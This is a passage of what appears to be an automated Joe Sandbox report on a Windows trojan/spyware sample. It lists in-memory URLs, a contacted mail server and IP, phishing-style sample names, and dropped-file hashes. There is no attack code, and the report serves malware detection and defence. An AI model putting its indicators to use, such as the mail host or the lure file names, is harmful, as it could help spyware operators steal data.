                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.carterandcone.comjK0%Avira URL Cloudsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.carterandcone.como.0%URL Reputationsafe
                      http://www.carterandcone.como.0%URL Reputationsafe
                      http://www.carterandcone.como.0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/str0%Avira URL Cloudsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/Yyz0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/Ian0%Avira URL Cloudsafe
                      http://www.carterandcone.comage0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.founder.com.cn/cn/0%URL Reputationsafe
                      http://www.founder.com.cn/cn/0%URL Reputationsafe
                      http://www.founder.com.cn/cn/0%URL Reputationsafe
                      http://onNZeSBttjiYV.comT0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.privateemail.com
                      		198.54.122.60
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://onNZeSBttjiYV.comtrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.fontbureau.comaYyzSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.243051954.00000000063EA000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://127.0.0.1:HTTP/1.1SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.507292390.0000000003081000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.fontbureau.com/designersGSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://ocsp.sectigo.com0SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.514048198.0000000006AB0000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers?SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                              		high
                              http://www.jiyu-kobo.co.jp/a-dSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/jp/KyhSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://ozGnLl.comSecuriteInfo.com.Win32.18332.exe, 00000005.00000002.507292390.0000000003081000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/Y0bdPySecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.tiro.comSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                		high
                                http://www.goodfont.co.krSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/Y0trSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.carterandcone.comSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.jiyu-kobo.co.jp/ersSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.241732490.00000000063EA000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sajatypeworks.comSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://fontfabrik.comSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comvKSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.comgritaSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261309421.00000000063E8000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/ByqSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/py?SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fonts.comSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.sandoll.co.krSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.urwpp.deDPleaseSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comjKSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.zhongyicts.com.cnSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.carterandcone.como.SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.241053632.00000000063F4000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sakkal.comSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256848619.0000000004239000.00000004.00000001.sdmp, SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.503288877.0000000000402000.00000040.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/strSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.241732490.00000000063EA000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.514048198.0000000006AB0000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.comSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmp, SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.243051954.00000000063EA000.00000004.00000001.sdmpfalse
                                          		high
                                          http://DynDns.comDynDNSSecuriteInfo.com.Win32.18332.exe, 00000005.00000002.507292390.0000000003081000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://sectigo.com/CPS0SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.514048198.0000000006AB0000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haSecuriteInfo.com.Win32.18332.exe, 00000005.00000002.507292390.0000000003081000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/YyzSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/IanSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.carterandcone.comageSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://mail.privateemail.comSecuriteInfo.com.Win32.18332.exe, 00000005.00000002.509767240.00000000031C2000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.jiyu-kobo.co.jp/jp/SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmp, SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242087812.00000000063EA000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.comlSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmp, SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cn/SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.240672003.00000000063F0000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                              		high
                                              http://onNZeSBttjiYV.comTSecuriteInfo.com.Win32.18332.exe, 00000005.00000002.508389170.000000000314E000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.founder.com.cn/cnSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/frere-jones.htmlSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.comoituSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.243051954.00000000063EA000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/anieSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242087812.00000000063EA000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/KyhSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242016784.00000000063E6000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fontbureau.commSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.243051954.00000000063EA000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.comoSecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261309421.00000000063E8000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers8SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.jiyu-kobo.co.jp/eSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.241504758.00000000063E3000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.comsiefSecuriteInfo.com.Win32.18332.exe, 00000000.00000003.243051954.00000000063EA000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  198.54.122.60
                                                  		unknownUnited States
                                                  		22612NAMECHEAP-NETUSfalse

                                                  General Information

                                                  Joe Sandbox Version:31.0.0 Emerald
                                                  Analysis ID:356591
                                                  Start date:23.02.2021
                                                  Start time:11:49:36
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 11m 8s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:SecuriteInfo.com.Win32.18332.23451 (renamed file extension from 23451 to exe)
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:27
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@10/4@1/1
                                                  EGA Information:Failed
                                                  HDC Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 141
                                                  • Number of non-executed functions: 2
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                  • Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.147.198.201, 92.122.145.220, 13.88.21.125, 104.43.139.144, 23.218.208.56, 51.104.139.180, 52.255.188.83, 8.248.117.254, 8.253.207.120, 8.253.204.121, 8.248.147.254, 67.26.75.254, 52.155.217.156, 51.103.5.186, 20.54.26.129, 92.122.213.247, 92.122.213.194
                                                  • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, vip2-par02p.wns.notify.trafficmanager.net
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  11:50:35API Interceptor802x Sleep call for process: SecuriteInfo.com.Win32.18332.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  198.54.122.60s3HAoqkLuR.exeGet hashmaliciousBrowse
                                                    Request For Quotation RFQ 53253quote Pricelist of Order.docGet hashmaliciousBrowse
                                                      Order Specification.docGet hashmaliciousBrowse
                                                        ORDER.docGet hashmaliciousBrowse
                                                          SecuriteInfo.com.FileRepMalware.4966.exeGet hashmaliciousBrowse
                                                            dwXuNeEeql.exeGet hashmaliciousBrowse
                                                              DG6PQDuCfL.exeGet hashmaliciousBrowse
                                                                KlvNqu5mwX.exeGet hashmaliciousBrowse
                                                                  tBNZZd447N.exeGet hashmaliciousBrowse
                                                                    b31cHqumvH.exeGet hashmaliciousBrowse
                                                                      O65XH93Hl6.exeGet hashmaliciousBrowse
                                                                        ZbnDULcjzp.exeGet hashmaliciousBrowse
                                                                          pDFkpNZVB7.exeGet hashmaliciousBrowse
                                                                            ztoq7ir7cm.exeGet hashmaliciousBrowse
                                                                              1r7gZ8xeDL.exeGet hashmaliciousBrowse
                                                                                RFQ-21123.docGet hashmaliciousBrowse
                                                                                  Inquiry.docGet hashmaliciousBrowse
                                                                                    PO2172021.docGet hashmaliciousBrowse
                                                                                      5043-200 Project TC Rev.0..docGet hashmaliciousBrowse
                                                                                        Payment Advice.docGet hashmaliciousBrowse

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          mail.privateemail.coms3HAoqkLuR.exeGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          Request For Quotation RFQ 53253quote Pricelist of Order.docGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          Order Specification.docGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          ORDER.docGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          SecuriteInfo.com.FileRepMalware.4966.exeGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          dwXuNeEeql.exeGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          DG6PQDuCfL.exeGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          KlvNqu5mwX.exeGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          tBNZZd447N.exeGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          b31cHqumvH.exeGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          O65XH93Hl6.exeGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          ZbnDULcjzp.exeGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          pDFkpNZVB7.exeGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          ztoq7ir7cm.exeGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          1r7gZ8xeDL.exeGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          RFQ-21123.docGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          Inquiry.docGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          PO2172021.docGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          5043-200 Project TC Rev.0..docGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          Payment Advice.docGet hashmaliciousBrowse
                                                                                          • 198.54.122.60

                                                                                          ASN

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          NAMECHEAP-NETUSs3HAoqkLuR.exeGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          KS8siMUTE5e1x6h.exeGet hashmaliciousBrowse
                                                                                          • 192.64.119.253
                                                                                          proposal.xlsmGet hashmaliciousBrowse
                                                                                          • 198.54.116.171
                                                                                          Request For Quotation RFQ 53253quote Pricelist of Order.docGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          NewOrder.xlsmGet hashmaliciousBrowse
                                                                                          • 198.54.115.38
                                                                                          mexhlc.xlsxGet hashmaliciousBrowse
                                                                                          • 199.188.200.203
                                                                                          Order Specification.docGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          ORDER.docGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          Order83930.exeGet hashmaliciousBrowse
                                                                                          • 198.54.117.210
                                                                                          receipt145.htmGet hashmaliciousBrowse
                                                                                          • 198.54.115.226
                                                                                          SecuriteInfo.com.Trojan.Inject4.6572.1327.exeGet hashmaliciousBrowse
                                                                                          • 162.213.253.52
                                                                                          SecuriteInfo.com.FileRepMalware.4966.exeGet hashmaliciousBrowse
                                                                                          • 198.54.122.60
                                                                                          eInvoice.exeGet hashmaliciousBrowse
                                                                                          • 198.54.117.215
                                                                                          IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                                                          • 198.54.117.218
                                                                                          Outstanding Invoices.pdf.exeGet hashmaliciousBrowse
                                                                                          • 199.192.19.85
                                                                                          SecuriteInfo.com.W32.AIDetectGBM.malware.01.25871.exeGet hashmaliciousBrowse
                                                                                          • 162.0.235.69
                                                                                          DHL Shipment Notification 7465649870,pdf.exeGet hashmaliciousBrowse
                                                                                          • 198.187.29.8
                                                                                          BANK SWIFT- USD 98,712.00.pdf.exeGet hashmaliciousBrowse
                                                                                          • 198.54.116.236
                                                                                          urgent specification request.exeGet hashmaliciousBrowse
                                                                                          • 162.0.232.231
                                                                                          pko_trans_details_20210208_145000.docxGet hashmaliciousBrowse
                                                                                          • 199.193.7.228

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          C:\Users\user\AppData\Roaming\mwflisJj.exeOrder Specification.docGet hashmaliciousBrowse

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.18332.exe.log
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):1314
                                                                                            Entropy (8bit):5.350128552078965
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                                            MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                                            SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                                            SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                                            SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                                            Malicious:true
                                                                                            Reputation:high, very likely benign file
